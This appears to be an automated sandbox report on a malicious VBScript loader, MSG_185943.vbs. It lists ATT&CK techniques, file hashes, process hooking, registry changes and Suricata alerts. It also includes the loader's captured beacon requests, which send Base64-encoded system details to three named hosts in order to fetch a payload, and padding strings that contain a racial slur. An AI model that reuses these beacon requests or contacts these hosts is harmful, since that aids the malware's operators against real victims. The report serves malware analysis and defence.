Heuristic match: "GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: clusterlacteoatlantico.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"ous examinationist ejurate reinfluencing chlorotically odoriferously kanoon Svantovit CONN turf-digging chutney reconfuse receivers buffering intently flow-on holsteins unforgettingly amplifier Olmito Pixley vivisectional dipsie Transjordanian croose wrabbe funambulation twittering unconjured joying seminarial phenomenist ugly-visaged apoaconitine bellwethers ASDIC short-headedness agriculture Stilesville prinkers well-kempt nonfinal unoared" (Indicator: "twitter")
"lasmic traditive careering Glendean supersacrifice missional arraignable dribblets ablatives Oden migmatite prefills repressor oscillance aromacity endermatic unsweetenedness evolutionize laryng- ectocondylar delicate-handed eventognathous nonerotically usherance pewterwort Landsturm Sibley dervishhood twitteration unidentifiedly Biondo Euclides nosing overinflation progenerative misbelief Mtbaldy emmew ooliths Gluneamie undissected Kleist uneddied haubergeon nontemptation rebooting satirically edplot crystallochemistry deliveryman mealymouthed malnutrite germlike Sapers nonfeverishness tinworks Cantor antiparallelogram proxenet twinnings feloniously bassanite Kolombangara lengther unpredictableness belay sweet-wort aplanatism undubitatively upharbor duskishly niggerish prated continuously preliteralness" (Indicator: "twitter")
"ian antiluetic pipistrel prebilling unpossessive napalm Aludra coawareness metaprescutum precomputing undispelled old-fashionedly astrogeologist well-characterized recontrolling 'spawl sticky-fingered over-cautious practicable retradition linter subelongated eaglelike albicans overexhaust top-heaviness lobbyman co-worship adular dik-dik disproportionately hero-worship doublethinking consortism toadies againward Gunnera pre-exchange suitcase Rowletts side-necked flashtester enfoncee dispromise skeiner electioneer resorptive nonvisiting paring monepiscopacy depressible vallated chastisement syllidian snowmold continuua Tobye acatamathesia world-rousing runagate unswaying patas infinitant Anti-klanism Konev Hollywood ballutes glycemia cresotic caddis cockscombed Rialto moontide Guetar glumella god-king single-tap Lide hoo-ha tooth-billed Scoto-Gaelic patibulated underplate electrifiers unjesting vindicates Magnuson freeloads gladding ecliptically exerciser heiress-ship shishya twitteration platycyrtean Kellina b" (Indicator: "twitter")
"EnrDjRmkmOWUxdNHcwGbxKjgF=QLxacsowmSIPkjKuIvGFIaJk+QLxacsowmSIPkjKuIvGFIaJk
'labiolingual solecising philotheosophical minimifidianism decencys outsprang full-celled indenture Garnerville codirect allegorize needle-and-thread hereditarian meadowlark short-spoken cyclomania implementors subscriptively crewing nonsecretories Yahganan unduped yellowishness penlites rainproofer Amuchco unsmelted B/E methemoglobinemia continua astrobotany Siberson subobliqueness Polystictus olios overcarrying promissvry circuminsession Anesidora coathangers goburra quacksalver dept. Gilles befile Mizuki twittered kodaker snary tempest-driven premodifying pazazzes taurophobe unconclusiveness cotele shovelfish opposites semiheretical reprice Pfalz interstrial suddy Algie scrimshorn pistilligerous lichen-clad bituberculate noncustodial pyoderma rainfall DCVO westernising distorting dreamboat keruing vestryhood explement Auwers Quashee infested Peltigeraceae triregnum microsurgeon senatus braseros miliolite ideologist Davies broad-m" (Indicator: "twitter")
"Set ac=td.Actions.Create(0)
'cow-eyed TEC dermato-autoplasty breathalyse Wonder Flinton unrhyming shamableness securifer talcs blastochyle meat prisonlike quadroon custard Agnatha Camptonville wreathlet self-written empiricalness nylghais such-like irregulate lagostoma ungloweringly urinemias continentality Suffr. Sageretia gangsters manbria paroled collutoria catastasis bauleah hypocotyl Fontaine newstands foregrounds mucorine countersea tetragynian kudus vineyarding Un-portuguese outwitter Tzong Hawkeyes outfasted fecklessly man-hater atelestite Strophanthus nibsome idealless appealing BUS GEIS Morez prothalline panpneumatism shikars hypercyanotic D.S.C. philocyny barkpeel carpogam breeders bi-tri- laevigate captaculum twice-dared bull-god arthrosporic sulphinate contexts UID overcorrects deep-groaning mopus bahut lockets pre-endorser ponhaws one-letter haroset direcly pyramidally close-tempered alto-relievos hightop lowdah epicycloidal hyporrhythmic suboxides Weichsel stringlike scoutings besmottered semi" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "fae60d77e1a612772e711277ee29127785e20d776da0127726e40d77d16d1277003d1077804b107700000000ad3731758b2d3175b641317500000000" to virtual address "0x74461000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "1f4cd672" to virtual address "0x6DDE1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "c04e107720541177e0651177b53812770000000000d0737500000000c5ea73750000000088ea737500000000e9681f7582281277ee29127700000000d2691f75000000007dbb73750000000009be1f7500000000ba18737500000000" to virtual address "0x75351000" (part of module "NSI.DLL")
"wscript.exe" wrote bytes "e7390e77e1a612772e711277ee29127785e20d776da01277906411773ad5187726e40d77d16d1277003d1077804b107700000000ad3731758b2d3175b641317500000000" to virtual address "0x749C1000" (part of module "WSHIP6.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_185943.vbs
- Filename
- MSG_185943.vbs
- Size
- 938KiB (960877 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- b1df3f5bada703f1266b7b0dd18e243ae63a81839f5d7273fb33aa2b48eef709
- MD5
- 026625745e12a28a5e811acf5cdcc0c5
- SHA1
- ccb6c0b2f8a63e004cfa9c4a7b3b50d5300ee04b
- ssdeep
- 12288:gVrNWZIciP+yA4FnpHP3/+dXPzFs+pxo/bGY6mXuFieGOLbQbxBwiU0OcLk+:gV0hUI4xpPmd5tHoSLFienvQXwD0OL+
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total.
- wscript.exe "C:\MSG_185943.vbs" (PID: 4480)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
cheron.co.uk
OSINT |
160.153.128.4
TTL: 10799 |
http://uk.godaddy.com
Name Server: ns75.domaincontrol.com Creation Date: Wed, 28 Aug 2019 00:00:00 GMT |
United States |
clusterlacteoatlantico.com
OSINT |
23.229.248.72
TTL: 10799 |
GoDaddy.com, LLC | United States |
gabinetedepsicologia.com
OSINT |
160.153.129.23
TTL: 599 |
GoDaddy.com, LLC
Name Server: NS43.DOMAINCONTROL.COM Creation Date: Sat, 23 Nov 2002 18:43:52 GMT |
United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
160.153.128.4 |
80
TCP |
wscript.exe PID: 4480 |
United States |
160.153.129.23 |
80
TCP |
wscript.exe PID: 4480 |
United States |
23.229.248.72 |
80
TCP |
wscript.exe PID: 4480 |
United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
160.153.128.4:80 (cheron.co.uk) | GET | cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: cheron.co.uk More Details |
160.153.128.4:80 (cheron.co.uk) | GET | cheron.co.uk/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: cheron.co.uk More Details |
160.153.129.23:80 (gabinetedepsicologia.com) | GET | gabinetedepsicologia.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: gabinetedepsicologia.com More Details |
23.229.248.72:80 (clusterlacteoatlantico.com) | GET | clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACA... | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: clusterlacteoatlantico.com More Details |
23.229.248.72:80 (clusterlacteoatlantico.com) | GET | clusterlacteoatlantico.com/location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACA... | GET /location/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: FoxKids
Host: clusterlacteoatlantico.com More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 23.229.248.72:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 160.153.129.23:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 160.153.128.4:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 23.229.248.72:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering (Process) was applied
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report